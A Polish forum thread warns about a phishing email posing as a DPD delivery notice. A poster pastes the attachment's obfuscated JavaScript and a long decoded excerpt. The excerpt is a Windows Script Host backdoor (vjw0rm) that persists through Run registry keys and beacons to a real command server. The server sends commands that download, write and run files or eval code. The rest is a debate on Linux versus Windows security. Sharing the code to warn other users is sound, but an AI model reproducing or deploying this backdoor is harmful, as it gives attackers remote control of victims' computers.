Niebezpieczne wiadomości

[AndyCopter]

Obecnie trwa rozsyłanie wiadomości e-mail w tytule: "DPD - Powiadomienie o planowanym doręczeniu przesyłki"

 

Oprogramowanie antywirusowe jest całkowicie bezradne. Szczególnie dotyczy to osób posiadających oprogramowanie windows. Przed otwieraniem wiadomości, proszę sprawdzić faktycznego nadawcę. W tej wiadomości, przestępca podszywa się pod firmę kurierską DPD. Wiadomość dla zwiększenia autentyczności, opatrzona jest typowymi dla tej firmy kurierskiej treściami.

 

Pod żadnym pozorem, nie należy otwierać załączników - zaznaczone na czerwono na zdjęciach poniżej.

 

 

 

 

 

Firma DPD została powiadomiona, trwa również ustalanie sprawcy. Jednak do czasu zatrzymania przestępcy, proszę o zachowanie ostrożności przy otwieraniu takich wiadomości.

 

 

[Tomasz D.]

Jest na to sposób - nie używać Windows. W Linuksie wirusy nie działają.

[oko]

W Linuksie wirusy nie działają.

 

Używam jako głównego systemu linuksa chyba już z 20 lat, ale z tym stwierdzeniem nie do końca się zgodzę. Ten wirus to po prostu plik javascript, zapewne z jakoś dziko zakodowanymi adresami IP. Nie wiem co robi, wysyła zawartość głównego katalogu? Ale to bardziej kwestia przeglądarki niż systemu operacyjnego. 

[-==PEGAZ==-]

To najprawdopodobniej kolejny wirus szyfrujący dane. Panowie, już od win7 warto sobie uruchamiać tzw. historie plików. Dzięki temu możliwe jest odzyskanie danych po przypadkowym uruchomieniu skryptu.

[AndyCopter]

Zamierzałem tylko przestrzec oczekujących wiadomości od firm kurierskich przed fałszywymi wiadomościami. A tym czasem pojawiła się i dyskusja   

Zatem aby uciąć spekulacje, poniżej fragment kodu z plliku JS :

var s = String.fromCharCode(47,47,32,67,111,100,101,100,32,98,121,32,118,95,66,48,49,32,124,32,83,108,105,101,109,101,114,101,122,32,45,62,32,84,119,105,116,116,101,114,32,58,32,83,108,105,101,109,101,114,101,122,13,10,13,10,118,97,114,32,106,32,61,32,91,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,44,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,11

oraz fragment już zdekodowanego:

// Coded by v_B01 | Sliemerez -> Twitter : Sliemerez
var j = ["WScript.Shell", "Scripting.FileSystemObject", "Shell.Application", "Microsoft.XMLHTTP"]; var g = ["HKCU", "HKLM", "HKCU\\vjw0rm", "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\SOFTWARE\\Classes\\", "REG_SZ", "\\defaulticon\\"]; var y = ["winmgmts:", "win32_logicaldisk", "Win32_OperatingSystem", 'AntiVirusProduct']; var sh = Cr(0); var fs = Cr(1); var spl = "|V|"; var Ch = "\\"; var VN = "dpd04" + "_" + Ob(6); var fu = WScript.ScriptFullName; var wn = WScript.ScriptName; var U; try {
  U = sh.RegRead(g[2]);
} catch (err) {
  var sv = fu.split("\\");
  if (":\\" + sv[1] == ":\\" + wn) {
    U = "TRUE";
    sh.RegWrite(g[2], U, g[5]);
  } else {
    U = "FALSE";
    sh.RegWrite(g[2], U, g[5]);
  }
} Ns(); do {
  try {
    var P = Pt('Vre', '');
    P = P.split(spl);
    if (P[0] == = "Cl") {
      WScript.Quit(1);
    } if (P[0] == = "Sc") {
      var s2 = Ex("temp") + "\\" + P[2];
      var fi = fs.CreateTextFile(s2, true);
      fi.Write(P[1]);
      fi.Close();
      sh.run(s2);
    } if (P[0] == = "Ex") {
      eval(P[1]);
    } if (P[0] == = "Rn") {
      var ri = fs.OpenTextFile(fu, 1);
      var fr = ri.ReadAll();
      ri.Close();
      VN = VN.split("_");
      fr = fr.replace(VN[0], P[1]);
      var wi = fs.OpenTextFile(fu, 2, false);
      wi.Write(fr);
      wi.Close();
      sh.run("wscript.exe //B \"" + fu + "\"");
      WScript.Quit(1);
    } if (P[0] == = "Up") {
      var s2 = Ex("temp") + "\\" + P[2];
      var ctf = fs.CreateTextFile(s2, true);
      var gu = P[1];
      gu = gu.replace("|U|", "|V|");
      ctf.Write(gu);
      ctf.Close();
      sh.run("wscript.exe //B \"" + s2 + "\"", 6);
      WScript.Quit(1);
    } if (P[0] == = "Un") {
      var s2 = P[1];
      var vdr = Ex("Temp") + Ch + wn;
      var regi = "MWDCVZ42NG";
      s2 = s2.replace("%f", fu).replace("%n", wn).replace("%sfdr", vdr).replace("%RgNe%", regi);
      eval(s2);
      WScript.Quit(1);
    } if (P[0] == = "RF") {
      var s2 = Ex("temp") + "\\" + P[2];
      var fi = fs.CreateTextFile(s2, true);
      fi.Write(P[1]);
      fi.Close();
      sh.run(s2);
    }
  } catch (err) { } WScript.Sleep(7000);
  Spr();
} while (true) ; function Ex(S) {
  return sh.ExpandEnvironmentStrings("%" + S + "%");
} function Pt(C, A) {
  var X = Cr(3);
  X.open('POST', 'http://pobierz.www1.biz:1411/' + C, false);
  X.SetRequestHeader("User-Agent:", nf());
  X.send(A);
  return X.responsetext;
} function nf() {
  var s, NT, i;
  if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
    NT = "YES";
  } else {
    NT = "NO";
  } s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
  return s;
} function Cr(N) {
  return new ActiveXObject(j[N]);
} function Ob(N) {
  var s; if (N == 2) {
    s =

[Tomasz D.]

Nie znam języka Java, ale niektóre polecenia zdają się próbować zastępować wpisy w rejestrze Windows, tak więc ten skrypt z pewnością zmieni działanie systemu. W Linuksie rejestr nie występuje, więc ten skrypt może co najwyżej powodować rozsyłanie się przez klienta poczty lub poprzez przeglądarkę, system pozostanie nietknięty.

[oko]

To nie java, ale javascript, jeden z najdziwniejszych (i najbardziej popularnych) języków w dzisiejszych czasach. Poprawnie używany oferuje ogromne możliwości np pod względem na przykład konstrukcji funkcyjnych. Źle używany powoduje powstanie koszmarnego kodu. A używany ze złą intencją... no właśnie, to widać. Tu bardziej zaszkodzi windows, ale tylko dlatego że jest "skonstruowany" dla tego systemu. Gdy windows jest poprawnie skonfigurowane, działa jak linux, to znaczy że nie da się zmieniać systemu przez użytkownika bez praw administratora, a więc przez taki skrypt. 

[Tomasz D.]

To oczywiste, że największym zagrożeniem dla komputera jest jego użytkownik. Jeśli dobrze się postara, to może komputer na Linuksie uczynić równie podatnym na robaki i inne śmiecie jak ten na Windowsie. Jeżeli jednak użytkownicy Windows przestrzegali by względów bezpieczeństwa, to twierdzisz, że wirusy i inne takie były by dla tego systemu niegroźne? Oj, chyba to nie jest cała prawda. Konstrukcja Windows czyni go zdecydowanie podatniejszym na wszelkiego rodzaju "hacki" niż Linuksa.

[czarobest]

Moim zdaniem najwięcej po prostu zależy od użytkownika, na 2 laptopy w domu, na których zainstalowany jest avast nie było wirusa od ich nowości (a to już sporo), na moim stacjonarnym z Windowsem 10 nie mam żadnego antywirusa (poza wbudowanym Defenderem w system) i również nigdy nie miałem żadnego syfu. Reinstalacje robię tylko kiedy ja chcę. Wystarczy uważać. Taka wiadomość od razu wygląda na podejrzaną, szczególnie jak ktoś nic nie zamawiał.

[oko]

Głównym problemem windows są złe ustawienia defaultowe, prawo zapisu tam gdzie nie powinno go być. Oraz brak repozytorium, przez co tak dużo programów (włącznie z przeglądarkami, klientami poczty, itd) się instaluje "ręcznie". No i rozdęcie systemu, znacznie trudniej jest zapanować nad jego utrzymaniem. Sama koncepcja rejestru też jest dość beznadziejna.

 

Ale taki wirus jak ten to i na linuksie by mógł być szkodliwy. Mógłby na przykład przesyłać jakieś pliki na zewnątrz, albo skasować katalog domowy. Tyle że faktycznie trudno by było zmodyfikować na przykład klienta poczty, by każdy mail był wysyłany na ukryty adres.

 

Mnie to nawet bawią te javascriptowe wirusy, są pouczające. Bardzo lubię też te o konieczności zmiany hasła, zawsze robię to co każą

[robertus]

Zawsze się znajdzie jakiś lepszy sposób zainfekowania komputera. Tu np bazuje się na bezwiednym klikaniu użytkownika.

A wystarczy spojrzeć, że ten pdf ma jeszcze jakieś dziwne dodatkowe rozszerzenie js.

 

PS. Jadąc do domu słyszałem w radio, że rozsyłają faktury pod przykrywką Play-a.

PS2. I to nie chodzi o to, że Windows jest taki kiepski. Chodzi o to, że jest popularny.

 

 

[Tomasz D.]

Jest kiepski (szczególnie pod względem bezpieczeństwa) i w dodatku każą sobie za niego płacić. Popularność jedynie multiplikuje zagrożenia.

[AndyCopter]

Dokładniejsza analiza kodu wiadomości, pozwoliła na dość interesujące wnioski.

 

Poprzez rozsyłanie fałszywej wiadomości, przestępca zakładał, że odbiorca posiadać będzie microsoft windows, dzięki czemu zainstalowanie wirusa umieszczonego w skrypcie dołączonym do wiadomości, pozwoli na automatyczne pobranie i uruchomienie pliku programu szyfrującego dane na dysku swojej ofiary. Celem jest - tzn. miało być, zaszyfrowanie kluczowych plików na dysku ofiary i żądanie płatnego "okupu" w bitcoin'ach za dostarczenie klucza dekodującego.

 

Na szczęście dla potencjalnych ofiar, ów przestępca okazał się być nieudolnym złodziejem rozwiązań hackerów, za których to starał się podszywać. Dzięki czemu ów przestępca złodziej, kompletnie nie rozumiejąc kodu rozsyłanej wiadomości, nie był w stanie przyczynić się do zamierzanych-oczekiwanych rezultatów.

 

Niemniej jednak, warto wykazać się rozsądkiem przeglądając wiadomości w poczcie elektronicznej i wykazywać ograniczonym zaufaniem do programów antywirusowych.